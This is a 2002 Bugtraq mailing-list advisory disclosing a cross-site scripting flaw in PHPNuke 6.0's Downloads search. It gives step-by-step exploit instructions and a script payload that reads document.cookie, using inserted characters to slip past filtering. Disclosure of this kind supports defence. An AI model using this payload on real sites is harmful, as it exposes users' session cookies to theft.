[27394] in bugtraq
XSS bug in PHPNuke 6.0
daemon@ATHENA.MIT.EDU (Arab VieruZ)
Fri Oct 11 12:30:37 2002
Date: 10 Oct 2002 22:19:41 -0000
Message-ID: <20021010221941.7534.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Arab VieruZ <arabviersus@hotmail.com>
To: bugtraq@securityfocus.com
Vulnerable systems:
PHPNuke 6.0 & mabey all
Exploit:
1- go to http://[traget]/modules.php?name=Downloads&d_op=search
2- put in form search this code :
<Scr*ipt>javascript:alert(document.cookie)</Scr*ipt>
3- click "Search"
(without "*")
you can't use it an URL like this
http://[traget]/modules.php?
name=Downloads&d_op=search&query=<Scri*pt>javascript:alert(document.cookie)
</Scri*pt>
it will write "I don't like you..." me 2 :)
----------------------------------
Arab Vieruz
thanx